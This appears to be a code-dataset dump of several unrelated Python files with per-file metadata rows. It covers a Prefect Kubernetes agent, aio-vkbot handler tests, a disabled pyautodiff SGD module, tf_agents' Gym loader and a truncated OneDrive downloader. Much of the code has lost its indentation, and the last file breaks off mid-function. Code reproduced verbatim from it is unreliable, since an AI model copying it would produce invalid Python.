try:
self.manage_jobs()
except Exception:
self.logger.error("Error while managing existing k8s jobs", exc_info=True)
super().heartbeat()
def deploy_flow(self, flow_run: GraphQLResult) -> str:
"""
Deploy flow runs on to a k8s cluster as jobs
Args:
- flow_run (GraphQLResult): A GraphQLResult flow run object
Returns:
- str: Information about the deployment
"""
import urllib3.exceptions
self.logger.info("Deploying flow run {}".format(flow_run.id)) # type: ignore
job_spec = self.generate_job_spec(flow_run=flow_run)
job_name = job_spec["metadata"]["name"]
self.logger.debug("Creating namespaced job {}".format(job_name))
attempts = 3
while True:
try:
self.batch_client.create_namespaced_job(
namespace=self.namespace, body=job_spec
)
break
except self.k8s_client.rest.ApiException as exc:
if exc.status == 409:
# object already exists, previous submission was successful
# even though it errored
break
raise
except urllib3.exceptions.HTTPError:
attempts -= 1
if attempts == 0:
raise
self.logger.warning(
"Error submitting job %s, retrying...", job_name, exc_info=True
)
time.sleep(1)
self.logger.debug("Job {} created".format(job_name))
return "Job {}".format(job_name)
def generate_job_spec(self, flow_run: GraphQLResult) -> dict:
"""Generate a k8s job spec for a flow run
Args:
- flow_run (GraphQLResult): A flow run object
Returns:
- dict: a dictionary representation of a k8s job for flow execution
"""
run_config = self._get_run_config(flow_run, KubernetesRun)
assert run_config is None or isinstance(run_config, KubernetesRun) # mypy
if run_config is not None:
return self.generate_job_spec_from_run_config(flow_run, run_config)
else:
return self.generate_job_spec_from_environment(flow_run)
def generate_job_spec_from_environment(
self, flow_run: GraphQLResult, image: str = None
) -> dict:
"""
Populate a k8s job spec. This spec defines a k8s job that handles
executing a flow. This method runs each time the agent receives
a flow to run.
That job spec can optionally be customized by setting the
following environment variables on the agent.
- `NAMESPACE`: the k8s namespace the job will run in, defaults to `"default"`
- `JOB_MEM_REQUEST`: memory requested, for example, `256Mi` for 256 MB. If this
environment variable is not set, the cluster's defaults will be used.
- `JOB_MEM_LIMIT`: memory limit, for example, `512Mi` for 512 MB. If this
environment variable is not set, the cluster's defaults will be used.
- `JOB_CPU_REQUEST`: CPU requested, defaults to `"100m"`
- `JOB_CPU_LIMIT`: CPU limit, defaults to `"100m"`
- `IMAGE_PULL_POLICY`: policy for pulling images. Defaults to `"IfNotPresent"`.
- `IMAGE_PULL_SECRETS`: name of an existing k8s secret that can be used to pull
images. This is necessary if your flow uses an image that is in a non-public
container registry, such as Amazon ECR, or in a public registry that requires
authentication to avoid hitting rate limits. To specify multiple image pull
secrets, provide a comma-delimited string with no spaces, like
`"some-secret,other-secret"`.
- `SERVICE_ACCOUNT_NAME`: name of a service account to run the job as.
By default, none is specified.
- `YAML_TEMPLATE`: the path to load the YAML template from. Defaults
to the embedded `job_spec.yaml`.
Args:
- flow_run (GraphQLResult): A flow run object
- image (str, optional): The full name of an image to use for the job
Returns:
- dict: a dictionary representation of a k8s job for flow execution
"""
identifier = str(uuid.uuid4())[:8]
yaml_path = os.getenv(
"YAML_TEMPLATE", os.path.join(os.path.dirname(__file__), "job_spec.yaml")
)
with open(yaml_path, "r") as job_file:
job = yaml.safe_load(job_file)
job_name = "prefect-job-{}".format(identifier)
# Populate job metadata for identification
k8s_labels = {
"prefect.io/identifier": identifier,
"prefect.io/flow_run_id": flow_run.id, # type: ignore
"prefect.io/flow_id": flow_run.flow.id, # type: ignore
}
job["metadata"]["name"] = job_name
job["metadata"]["labels"].update(**k8s_labels)
job["spec"]["template"]["metadata"]["labels"].update(**k8s_labels)
# Use provided image for job
if image is None:
image = get_flow_image(flow_run=flow_run)
job["spec"]["template"]["spec"]["containers"][0]["image"] = image
self.logger.debug("Using image {} for job".format(image))
# Determine the flow run command
job["spec"]["template"]["spec"]["containers"][0]["args"] = [
get_flow_run_command(flow_run)
]
# Populate environment variables for flow run execution
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
env[0]["value"] = config.cloud.api or "https://api.prefect.io"
env[1]["value"] = config.cloud.agent.auth_token
env[2]["value"] = flow_run.id # type: ignore
env[3]["value"] = flow_run.flow.id # type: ignore
env[4]["value"] = os.getenv("NAMESPACE", "default")
env[5]["value"] = str(self.labels)
env[6]["value"] = str(self.log_to_cloud).lower()
env[7]["value"] = config.logging.level
# append all user provided values
for key, value in self.env_vars.items():
env.append(dict(name=key, value=value))
# Use image pull secrets if provided
image_pull_secrets = os.getenv("IMAGE_PULL_SECRETS")
if image_pull_secrets:
secrets = image_pull_secrets.split(",")
for idx, secret_name in enumerate(secrets):
# this check preserves behavior from previous releases,
# where prefect would only overwrite the first entry in
# imagePullSecrets
if idx == 0:
job["spec"]["template"]["spec"]["imagePullSecrets"][0] = {
"name": secret_name
}
else:
job["spec"]["template"]["spec"]["imagePullSecrets"].append(
{"name": secret_name}
)
else:
del job["spec"]["template"]["spec"]["imagePullSecrets"]
# Set resource requirements if provided
resources = job["spec"]["template"]["spec"]["containers"][0]["resources"]
if os.getenv("JOB_MEM_REQUEST"):
resources["requests"]["memory"] = os.getenv("JOB_MEM_REQUEST")
if os.getenv("JOB_MEM_LIMIT"):
resources["limits"]["memory"] = os.getenv("JOB_MEM_LIMIT")
if os.getenv("JOB_CPU_REQUEST"):
resources["requests"]["cpu"] = os.getenv("JOB_CPU_REQUEST")
if os.getenv("JOB_CPU_LIMIT"):
resources["limits"]["cpu"] = os.getenv("JOB_CPU_LIMIT")
if self.volume_mounts:
job["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
] = self.volume_mounts
else:
del job["spec"]["template"]["spec"]["containers"][0]["volumeMounts"]
if self.volumes:
job["spec"]["template"]["spec"]["volumes"] = self.volumes
else:
del job["spec"]["template"]["spec"]["volumes"]
if os.getenv("IMAGE_PULL_POLICY"):
job["spec"]["template"]["spec"]["containers"][0][
"imagePullPolicy"
] = os.getenv("IMAGE_PULL_POLICY")
if os.getenv("SERVICE_ACCOUNT_NAME"):
job["spec"]["template"]["spec"]["serviceAccountName"] = os.getenv(
"SERVICE_ACCOUNT_NAME"
)
return job
def generate_job_spec_from_run_config(
self, flow_run: GraphQLResult, run_config: KubernetesRun
) -> dict:
"""Generate a k8s job spec for a flow run.
Args:
- flow_run (GraphQLResult): A flow run object
- run_config (KubernetesRun): The flow run's run_config
Returns:
- dict: a dictionary representation of a k8s job for flow execution
"""
if run_config.job_template:
job = run_config.job_template
else:
job_template_path = run_config.job_template_path or self.job_template_path
self.logger.debug("Loading job template from %r", job_template_path)
template_bytes = read_bytes_from_path(job_template_path)
job = yaml.safe_load(template_bytes)
identifier = uuid.uuid4().hex[:8]
job_name = f"prefect-job-{identifier}"
# Populate job metadata for identification
k8s_labels = {
"prefect.io/identifier": identifier,
"prefect.io/flow_run_id": flow_run.id, # type: ignore
"prefect.io/flow_id": flow_run.flow.id, # type: ignore
}
_get_or_create(job, "metadata.labels")
_get_or_create(job, "spec.template.metadata.labels")
job["metadata"]["name"] = job_name
job["metadata"]["labels"].update(**k8s_labels)
job["spec"]["template"]["metadata"]["labels"].update(**k8s_labels)
# Get the first container, which is used for the prefect job
containers = _get_or_create(job, "spec.template.spec.containers", [])
if not containers:
containers.append({})
container = containers[0]
# Set container image
container["image"] = image = get_flow_image(flow_run)
# Set flow run command
container["args"] = [get_flow_run_command(flow_run)]
# Populate environment variables from the following sources,
# with precedence:
# - Values required for flow execution, hardcoded below
# - Values set on the KubernetesRun object
# - Values set using the `--env` CLI flag on the agent
# - Values in the job template
env = self.env_vars.copy()
if run_config.env:
env.update(run_config.env)
env.update(
{
"PREFECT__CLOUD__API": config.cloud.api,
"PREFECT__CLOUD__AUTH_TOKEN": config.cloud.agent.auth_token,
"PREFECT__CLOUD__USE_LOCAL_SECRETS": "false",
"PREFECT__CONTEXT__FLOW_RUN_ID": flow_run.id,
"PREFECT__CONTEXT__FLOW_ID": flow_run.flow.id,
"PREFECT__CONTEXT__IMAGE": image,
"PREFECT__LOGGING__LOG_TO_CLOUD": str(self.log_to_cloud).lower(),
"PREFECT__ENGINE__FLOW_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudFlowRunner",
"PREFECT__ENGINE__TASK_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudTaskRunner",
}
)
container_env = [{"name": k, "value": v} for k, v in env.items()]
for entry in container.get("env", []):
if entry["name"] not in env:
container_env.append(entry)
container["env"] = container_env
# Set resource requirements if provided
_get_or_create(container, "resources.requests")
_get_or_create(container, "resources.limits")
resources = container["resources"]
if run_config.memory_request:
resources["requests"]["memory"] = run_config.memory_request
if run_config.memory_limit:
resources["limits"]["memory"] = run_config.memory_limit
if run_config.cpu_request:
resources["requests"]["cpu"] = run_config.cpu_request
if run_config.cpu_limit:
resources["limits"]["cpu"] = run_config.cpu_limit
return job
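# Hedged usage sketch for the run-config path above (only fields read by this method are
# shown; the flow's image and storage are configured elsewhere):
#     from prefect.run_configs import KubernetesRun
#     flow.run_config = KubernetesRun(
#         cpu_request="500m",
#         memory_limit="1Gi",
#         env={"MY_FLAG": "1"},
#     )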
@staticmethod
def generate_deployment_yaml(
token: str = None,
api: str = None,
namespace: str = None,
image_pull_secrets: str = None,
resource_manager_enabled: bool = False,
rbac: bool = False,
latest: bool = False,
mem_request: str = None,
mem_limit: str = None,
cpu_request: str = None,
cpu_limit: str = None,
image_pull_policy: str = None,
service_account_name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
backend: str = None,
) -> str:
"""
Generate and output an installable YAML spec for the agent.
Args:
- token (str, optional): A `RUNNER` token to give the agent
- api (str, optional): A URL pointing to the Prefect API. Defaults to
`https://api.prefect.io`
- namespace (str, optional): The namespace to create Prefect jobs in. Defaults
to `default`
- image_pull_secrets (str, optional): The name of an image pull secret to use
for Prefect jobs
- resource_manager_enabled (bool, optional): Whether to include the resource
manager as part of the YAML. Defaults to `False`
- rbac (bool, optional): Whether to include default RBAC configuration as
part of the YAML. Defaults to `False`
- latest (bool, optional): Whether to use the `latest` Prefect image.
Defaults to `False`
- mem_request (str, optional): Requested memory for Prefect init job.
- mem_limit (str, optional): Limit memory for Prefect init job.
- cpu_request (str, optional): Requested CPU for Prefect init job.
- cpu_limit (str, optional): Limit CPU for Prefect init job.
- image_pull_policy (str, optional): imagePullPolicy to use for Prefect init job.
Job defaults to `IfNotPresent`.
- service_account_name (str, optional): Name of a service account to use for
Prefect init job. Job defaults to using `default` service account.
- labels (List[str], optional): a list of labels, which are arbitrary string
identifiers used by Prefect Agents when polling for work
- env_vars (dict, optional): additional environment variables to attach to all
jobs created by this agent and to set in the agent's own environment
- backend (str, optional): toggle which backend to use for this agent.
Defaults to backend currently set in config.
Returns:
- str: A string representation of the generated YAML
"""
# Use defaults if not provided
token = token or ""
api = api or "https://api.prefect.io"
namespace = namespace or "default"
labels = labels or []
mem_request = mem_request or ""
mem_limit = mem_limit or ""
cpu_request = cpu_request or ""
cpu_limit = cpu_limit or ""
image_pull_policy = image_pull_policy or ""
service_account_name = service_account_name or ""
backend = backend or config.backend
version = prefect.__version__.split("+")
image_version = (
"latest" if len(version) > 1 or latest else (version[0] + "-python3.6")
)
with open(
os.path.join(os.path.dirname(__file__), "deployment.yaml"), "r"
) as deployment_file:
deployment = yaml.safe_load(deployment_file)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
# Populate env vars
agent_env[0]["value"] = token
agent_env[1]["value"] = api
agent_env[2]["value"] = namespace
agent_env[3]["value"] = image_pull_secrets or ""
agent_env[4]["value"] = str(labels)
agent_env[11]["value"] = backend
# Populate job resource env vars
agent_env[5]["value"] = mem_request
agent_env[6]["value"] = mem_limit
agent_env[7]["value"] = cpu_request
agent_env[8]["value"] = cpu_limit
agent_env[9]["value"] = image_pull_policy
agent_env[10]["value"] = service_account_name
if env_vars:
agent_env.append(
{
"name": "PREFECT__CLOUD__AGENT__ENV_VARS",
"value": json.dumps(env_vars),
}
)
# Use local prefect version for image
deployment["spec"]["template"]["spec"]["containers"][0][
"image"
] = "prefecthq/prefect:{}".format(image_version)
# Populate resource manager if requested
if resource_manager_enabled:
resource_manager_env = deployment["spec"]["template"]["spec"]["containers"][
1
]["env"]
resource_manager_env[0]["value"] = token
resource_manager_env[1]["value"] = api
resource_manager_env[3]["value"] = namespace
# Use local prefect version for image
deployment["spec"]["template"]["spec"]["containers"][1][
"image"
] = "prefecthq/prefect:{}".format(image_version)
else:
del deployment["spec"]["template"]["spec"]["containers"][1]
# Populate image pull secrets if provided
if image_pull_secrets:
deployment["spec"]["template"]["spec"]["imagePullSecrets"][0][
    "name"
] = image_pull_secrets
else:
del deployment["spec"]["template"]["spec"]["imagePullSecrets"]
# Load RBAC if specified
rbac_yaml = []
if rbac:
with open(
os.path.join(os.path.dirname(__file__), "rbac.yaml"), "r"
) as rbac_file:
rbac_generator = yaml.safe_load_all(rbac_file)
for document in rbac_generator:
document["metadata"]["namespace"] = namespace
rbac_yaml.append(document)
output_yaml = [deployment]
output_yaml.extend(rbac_yaml)
return yaml.safe_dump_all(output_yaml, explicit_start=True)
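# --- Illustrative usage sketch (not part of the original agent module) ---
# A minimal example of rendering the deployment YAML via the static method
# documented above. Every argument value below is an assumption chosen for
# demonstration only; substitute real values for an actual deployment.
def _example_generate_deployment_yaml():  # hypothetical helper, illustration only
    yaml_text = KubernetesAgent.generate_deployment_yaml(
        token="RUNNER-TOKEN-PLACEHOLDER",   # assumed placeholder token
        namespace="prefect",                # assumed target namespace
        labels=["k8s", "example"],          # arbitrary example labels
        env_vars={"EXTRA_SETTING": "1"},    # extra env vars for flow-run jobs
        rbac=True,                          # also emit the RBAC documents
    )
    print(yaml_text)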
if __name__ == "__main__":
KubernetesAgent().start()
| 43.922252
| 105
| 0.545993
|
978788facb610507b3568ad240bfc3ea895c3525
| 765
|
py
|
Python
|
tests/test_handlers.py
|
thedyrn/aio-vkbot
|
7f6187eafb5fdc9dab8fcc36172a273fad6ce1ab
|
[
"MIT"
] | 2
|
2020-02-06T18:06:56.000Z
|
2021-02-20T23:03:09.000Z
|
tests/test_handlers.py
|
thedyrn/aio-vkbot
|
7f6187eafb5fdc9dab8fcc36172a273fad6ce1ab
|
[
"MIT"
] | null | null | null |
tests/test_handlers.py
|
thedyrn/aio-vkbot
|
7f6187eafb5fdc9dab8fcc36172a273fad6ce1ab
|
[
"MIT"
] | null | null | null |
import pytest
from unittest.mock import Mock
from aiobot import Handler, MessageHandler, CommandHandler, VkEventType, Update
@pytest.fixture
def update_from_dict(raw_new_message_update):
return Update.from_dict(raw_new_message_update)
def test_handler(update_from_dict):
mocked_callback = Mock()
h = Handler(mocked_callback, VkEventType.MESSAGE_NEW)
assert h.check_update(update_from_dict)
h.handle_update(update_from_dict, Mock())
assert mocked_callback.called
def test_message_handler(update_from_dict):
mocked_callback = Mock()
h = MessageHandler(mocked_callback)
assert h.check_update(update_from_dict)
h.handle_update(update_from_dict, Mock())
assert mocked_callback.called
# TODO: add CommandHandler tests
| 28.333333
| 79
| 0.789542
|
896cf9d927032462cc82aeae4962fa287bbf6cd2
| 7,973
|
py
|
Python
|
autodiff/fmin_sgd.py
|
gwtaylor/pyautodiff
|
7973e26f1c233570ed4bb10d08634ec7378e2152
|
[
"BSD-3-Clause"
] | 59
|
2015-02-03T20:50:59.000Z
|
2020-05-26T05:38:54.000Z
|
autodiff/fmin_sgd.py
|
gwtaylor/pyautodiff
|
7973e26f1c233570ed4bb10d08634ec7378e2152
|
[
"BSD-3-Clause"
] | 3
|
2015-05-10T06:22:45.000Z
|
2016-12-06T02:20:58.000Z
|
autodiff/fmin_sgd.py
|
gwtaylor/pyautodiff
|
7973e26f1c233570ed4bb10d08634ec7378e2152
|
[
"BSD-3-Clause"
] | 11
|
2015-04-15T16:52:09.000Z
|
2017-06-28T12:10:39.000Z
|
"""
Function minimization drivers based on stochastic gradient descent (SGD).
"""
import gc
import logging
import sys
import time
import numpy as np
import theano
from .context import Context
from .utils import flat_from_doc, doc_from_flat
from .utils import post_collect
logger = logging.getLogger(__name__)
info = logger.info
warn = logger.warn
raise NotImplementedError(
'fmin_sgd is a legacy file not supported in the current version of '
'PyAutoDiff (yet!)')
class FMinSGD(object):
"""
An iterator implementing the stochastic gradient descent algorithm.
On each iteration, this function increments each of self.current_args by
`-step_size` times its gradient with respect to `fn`, and returns the current
[stochastic] calculation of `fn`.
"""
def __init__(self, fn, args, streams, step_size, loops=1,
step_size_backoff=0.25,
theano_mode=None,
theano_device=None,
rseed=12345,
floatX='float64',
):
"""
fn - a callable taking *(args + (stream[i],))
args - the arguments of fn, which this function will search
streams - a dictionary of iterables (i.e. struct of arrays)
These must all have the same length, and FMinSGD will iterate
through them jointly, passing the i'th element of each
sequence to `fn` to get a gradient estimate.
step_size - a multiplier on the negative gradient used for search
- a float will be used for all args
- a tuple of floats will use each float for each arg
- a tuple of ndarrays will use each ndarray for each arg
- floats and ndarrays can both be used in a tuple here
theano_mode - (API leak) how to compile the underlying theano
function.
theano_device - (API leak) optional string to force cpu/gpu execution
"""
self.rng = np.random.RandomState(rseed)
self.step_size_backoff = step_size_backoff
ctxt = Context(device=theano_device, floatX=floatX)
s_streams0 = {} # -- symbolic element dictionary
streams0 = {} # -- non-symbolic first element dictionary
_len = sys.maxsize
s_stream_idx = ctxt.shared(np.asarray(0), name='stream_idx')
s_idxs = ctxt.shared(self.rng.randint(2, size=3), name='idxs')
s_idx = s_idxs[s_stream_idx]
for key, stream in streams.items():
stream0 = stream[0]
s_stream = ctxt.shared(stream, borrow=True)
s_stream_i = s_stream[s_idx]
assert s_stream_i.dtype == str(stream0.dtype)
if hasattr(stream, 'shape'):
# -- if stream is a tensor, then all elements have same size
# so bake stream0's size into the function.
ctxt.shadow(stream0, s_stream_i.reshape(stream0.shape))
else:
raise NotImplementedError('non ndarray stream', stream)
streams0[key] = stream0
s_streams0[key] = s_stream_i
_len = min(_len, len(stream))
# -- pass params as args, streams as kwargs
cost = ctxt.call(fn, args, streams0)
flat_args = flat_from_doc(args)
s_args = [ctxt.svars[id(w)] for w in flat_args]
s_cost = ctxt.svars[id(cost)]
# -- if step_size is a scalar, expand it out to match the args
try:
float(step_size)
step_size = (step_size,) * len(args)
except TypeError:
pass
s_step_sizes = [ctxt.shared(np.asarray(step)) for step in step_size]
if len(s_step_sizes) != len(args):
raise ValueError('len of step_size tuple must match len of args')
s_costs = ctxt.shared(np.zeros(3, dtype=s_cost.dtype), name='costs')
del ctxt
gc.collect()
#theano.printing.debugprint(s_cost)
g_args = theano.tensor.grad(s_cost, s_args,
disconnected_inputs='warn',
)
# -- shared var into which we will write stream entries
updates = [(a, a - theano.tensor.cast(s_step, a.dtype) * g)
for s_step, a, g, in zip(s_step_sizes, s_args, g_args)]
updates += [(s_stream_idx, s_stream_idx + 1)]
updates += [(s_costs,
theano.tensor.inc_subtensor(s_costs[s_stream_idx], s_cost))]
update_fn = theano.function([], [],
updates=updates,
mode=theano_mode,
#profile=1,
)
# theano.printing.debugprint(update_fn)
self.args = args
self.loops = loops
self.streams = streams
self.s_args = s_args
self.s_cost = s_cost
self.g_args = g_args
self.s_streams0 = s_streams0
self.update_fn = update_fn
self._len = _len
self.s_step_sizes = s_step_sizes
self.s_stream_idx = s_stream_idx
self.s_costs = s_costs
self.s_idxs = s_idxs
self.ii = 0
self.cost_history = []
def __iter__(self):
return self
def nextN(self, N, force=False):
# Theano's cvm has a really low-overhead direct call
# interface, which does not permit argument-passing.
# so we set up all the indexes we want to use in shared
# variables, and the s_stream_idx iterates over our list
# of randomly chosen indexes, and fills in the costs into
# self.s_costs.
fn = self.update_fn.fn
if force:
_N = N
else:
_N = min(N, int(self._len * self.loops) - self.ii)
if _N <= 0:
return []
idxs = self.rng.randint(self._len, size=_N)
self.s_stream_idx.set_value(0)
self.s_idxs.set_value(
idxs,
borrow=True)
self.s_costs.set_value(
np.zeros(_N, dtype=self.s_costs.dtype),
borrow=True)
args_backup = [a.get_value() for a in self.s_args]
try:
# when using the cvm, there is a special calling form
# that uses an internal for-loop
fn(n_calls=_N)
except TypeError:
for _ in range(_N):
fn()
rval = self.s_costs.get_value()
if np.isfinite(rval[-1]):
self.cost_history.append(np.mean(rval))
else:
info('decreasing step sizes by %f' % self.step_size_backoff)
[s_step.set_value(s_step.get_value() * self.step_size_backoff)
for s_step in self.s_step_sizes]
[s_a.set_value(a, borrow=True)
for s_a, a in zip(self.s_args, args_backup)]
if len(self.cost_history) > 3:
if not (self.cost_history[-1] <= self.cost_history[-3]):
info('decreasing step sizes by %f' % self.step_size_backoff)
[s_step.set_value(s_step.get_value() * self.step_size_backoff)
for s_step in self.s_step_sizes]
self.ii += len(rval)
return rval
def next(self, N=None):
rval = self.nextN(1)
if rval:
return rval[0]
else:
raise StopIteration()
@property
def current_args(self):
vals = [a.get_value() for a in self.s_args]
rval, pos = doc_from_flat(self.args, vals, 0)
assert pos == len(vals)
return rval
@post_collect
def fmin_sgd(*args, **kwargs):
"""
See FMinSGD for documentation. This function creates that object, exhausts
the iterator, and then returns the final self.current_args values.
"""
print_interval = kwargs.pop('print_interval', sys.maxsize)
obj = FMinSGD(*args, **kwargs)
while True:
t = time.time()
vals = obj.nextN(print_interval)
if len(vals):
print('Value', np.mean(vals), 'time', (time.time() - t))
else:
break
return obj.current_args
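# --- Illustrative sketch (assumption, independent of this legacy module) ---
# This module raises NotImplementedError at import time, so FMinSGD cannot be
# used directly here. The toy function below only demonstrates the update rule
# the FMinSGD docstring describes (args <- args - step_size * gradient) with
# plain NumPy on a made-up least-squares problem; all names and data are
# invented for illustration.
def _toy_sgd_sketch(step_size=0.1, n_steps=100, seed=0):
    rng = np.random.RandomState(seed)
    X = rng.randn(50, 3)                        # toy design matrix
    true_w = np.array([1.0, -2.0, 0.5])         # ground-truth weights
    y = X.dot(true_w) + 0.01 * rng.randn(50)    # noisy targets
    w = np.zeros(3)                             # the argument being searched
    for _ in range(n_steps):
        i = rng.randint(len(X))                 # one stochastic sample per step
        grad = 2.0 * (X[i].dot(w) - y[i]) * X[i]  # gradient of the squared error
        w = w - step_size * grad                # the SGD update
    return w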
| 34.515152
| 78
| 0.590117
|
458e61de53a9538b87cceba1e398ab89f3eaa18f
| 5,130
|
py
|
Python
|
tf_agents/environments/suite_gym.py
|
Bhaney44/agents
|
e5fd5b19ba86fbc5980c9f8e173ce959f8b7bb45
|
[
"Apache-2.0"
] | 4
|
2020-06-25T00:47:40.000Z
|
2021-07-07T15:07:59.000Z
|
tf_agents/environments/suite_gym.py
|
Bhaney44/agents
|
e5fd5b19ba86fbc5980c9f8e173ce959f8b7bb45
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/environments/suite_gym.py
|
Bhaney44/agents
|
e5fd5b19ba86fbc5980c9f8e173ce959f8b7bb45
|
[
"Apache-2.0"
] | 1
|
2020-08-18T13:32:15.000Z
|
2020-08-18T13:32:15.000Z
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Suite for loading Gym Environments.
Note we use gym.spec(env_id).make() on gym envs to avoid getting a TimeLimit
wrapper on the environment. OpenAI's TimeLimit wrappers terminate episodes
without indicating if the failure is due to the time limit, or due to negative
agent behaviour. This prevents us from setting the appropriate discount value
for the final step of an episode. To prevent that we extract the step limit
from the environment specs and utilize our TimeLimit wrapper.
"""
import gym
from tf_agents.environments import gym_wrapper
from tf_agents.environments import wrappers
import gin.tf
@gin.configurable
def load(environment_name,
discount=1.0,
max_episode_steps=None,
gym_env_wrappers=(),
env_wrappers=(),
spec_dtype_map=None):
"""Loads the selected environment and wraps it with the specified wrappers.
Note that by default a TimeLimit wrapper is used to limit episode lengths
to the default benchmarks defined by the registered environments.
Args:
environment_name: Name for the environment to load.
discount: Discount to use for the environment.
max_episode_steps: If None the max_episode_steps will be set to the default
step limit defined in the environment's spec. No limit is applied if set
to 0 or if there is no timestep_limit set in the environment's spec.
gym_env_wrappers: Iterable with references to wrapper classes to use
directly on the gym environment.
env_wrappers: Iterable with references to wrapper classes to use on the
gym_wrapped environment.
spec_dtype_map: A dict that maps gym specs to tf dtypes to use as the
default dtype for the tensors. An easy way to configure a custom
mapping through Gin is to define a gin-configurable function that returns
the desired mapping and call it in your Gin config file, for example:
`suite_gym.load.spec_dtype_map = @get_custom_mapping()`.
Returns:
A PyEnvironment instance.
"""
gym_spec = gym.spec(environment_name)
gym_env = gym_spec.make()
if max_episode_steps is None and gym_spec.timestep_limit is not None:
max_episode_steps = gym_spec.max_episode_steps
return wrap_env(
gym_env,
discount=discount,
max_episode_steps=max_episode_steps,
gym_env_wrappers=gym_env_wrappers,
env_wrappers=env_wrappers,
spec_dtype_map=spec_dtype_map)
@gin.configurable
def wrap_env(gym_env,
discount=1.0,
max_episode_steps=None,
gym_env_wrappers=(),
time_limit_wrapper=wrappers.TimeLimit,
env_wrappers=(),
spec_dtype_map=None,
auto_reset=True):
"""Wraps given gym environment with TF Agent's GymWrapper.
Note that by default a TimeLimit wrapper is used to limit episode lengths
to the default benchmarks defined by the registered environments.
Args:
gym_env: An instance of OpenAI gym environment.
discount: Discount to use for the environment.
max_episode_steps: If None the max_episode_steps will be set to the default
step limit defined in the environment's spec. No limit is applied if set
to 0 or if there is no timestep_limit set in the environment's spec.
gym_env_wrappers: Iterable with references to wrapper classes to use
directly on the gym environment.
time_limit_wrapper: Wrapper that accepts (env, max_episode_steps) params to
enforce a TimeLimit. Usually this should be left as the default,
wrappers.TimeLimit.
env_wrappers: Iterable with references to wrapper classes to use on the
gym_wrapped environment.
spec_dtype_map: A dict that maps gym specs to tf dtypes to use as the
default dtype for the tensors. An easy way to configure a custom
mapping through Gin is to define a gin-configurable function that returns
the desired mapping and call it in your Gin config file, for example:
`suite_gym.load.spec_dtype_map = @get_custom_mapping()`.
auto_reset: If True (default), reset the environment automatically after a
terminal state is reached.
Returns:
A PyEnvironment instance.
"""
for wrapper in gym_env_wrappers:
gym_env = wrapper(gym_env)
env = gym_wrapper.GymWrapper(
gym_env,
discount=discount,
spec_dtype_map=spec_dtype_map,
auto_reset=auto_reset,
)
if max_episode_steps is not None and max_episode_steps > 0:
env = time_limit_wrapper(env, max_episode_steps)
for wrapper in env_wrappers:
env = wrapper(env)
return env
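# --- Illustrative usage sketch (assumption, not part of the module) ---
# Loading a Gym environment through `load`, relying on the spec's default step
# limit and adding no extra wrappers. The environment id is an assumed example;
# any registered Gym id would work the same way.
def _example_load_cartpole():  # hypothetical helper, illustration only
  env = load('CartPole-v0', discount=0.99)
  time_step = env.reset()
  return env, time_step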
| 38.571429
| 79
| 0.738986
|
9089e46f122a23df12aa3d9a0cf8e111de603b55
| 566
|
py
|
Python
|
2020/Day17/tests.py
|
dh256/adventofcode
|
428eec13f4cbf153333a0e359bcff23070ef6d27
|
[
"MIT"
] | null | null | null |
2020/Day17/tests.py
|
dh256/adventofcode
|
428eec13f4cbf153333a0e359bcff23070ef6d27
|
[
"MIT"
] | null | null | null |
2020/Day17/tests.py
|
dh256/adventofcode
|
428eec13f4cbf153333a0e359bcff23070ef6d27
|
[
"MIT"
] | null | null | null |
import pytest
from Cubes import Cubes, Cubes2
test_data = [('test1.txt',1,11),('test1.txt',2,21),('test1.txt',6,112)]
test_data2 = [('test1.txt',1,29),('test1.txt',6,848)]
# Part 1
@pytest.mark.parametrize('file_name,cycles,result',test_data)
def test_simulate_cycles(file_name, cycles, result):
cubes = Cubes(file_name)
assert cubes.cycle(cycles) == result
# Part 2
@pytest.mark.parametrize('file_name,cycles,result',test_data2)
def test_simulate_cycles2(file_name, cycles, result):
cubes = Cubes2(file_name)
assert cubes.cycle(cycles) == result
| 31.444444
| 71
| 0.726148
|
fc068434ed8a0441d232c4e1fc0b38004e099159
| 3,566
|
py
|
Python
|
tools/drive_down.py
|
jacke121/HRNet-Facial-Landmark-Detection
|
6d29324ce8bf203518bb8e92d1df919145a7063c
|
[
"MIT"
] | null | null | null |
tools/drive_down.py
|
jacke121/HRNet-Facial-Landmark-Detection
|
6d29324ce8bf203518bb8e92d1df919145a7063c
|
[
"MIT"
] | null | null | null |
tools/drive_down.py
|
jacke121/HRNet-Facial-Landmark-Detection
|
6d29324ce8bf203518bb8e92d1df919145a7063c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from requests import Session
from base64 import b64encode
import aiofiles
import asyncio
import aiohttp
import os
class OneDrive:
"""
Downloads a shared file/folder to the local filesystem, preserving its structure.
params:
`str:url`: url to the shared one drive folder or file
`str:path`: local filesystem path
methods:
`download() -> None`: fire async download of all files found in URL
"""
def __init__(self, url=None, path=None):
if not (url and path):
raise ValueError("URL to shared resource or path to download is missing.")
self.url = url
self.path = path
self.prefix = "https://api.onedrive.com/v1.0/shares/"
self.suffix = "/root?expand=children"
self.session = Session()
self.session.headers.update(
{
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
" (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
)
def _token(self, url):
return "u!" + b64encode(url.encode()).decode()
def _traverse_url(self, url, name=""):
""" Traverse the folder tree and store leaf urls with filenames """
r = self.session.get(f"{self.prefix}{self._token(url)}{self.suffix}").json()
name = name + os.sep + r["name"]
# shared file
if not r["children"]:
file = {}
file["name"] = name.lstrip(os.sep)
file["url"] = r["@content.downloadUrl"]
self.to_download.append(file)
print(f"Found {file['name']}")
# shared folder
for child in r["children"]:
if "folder" in child:
self._traverse_url(child["webUrl"], name)
if "file" in child:
file = {}
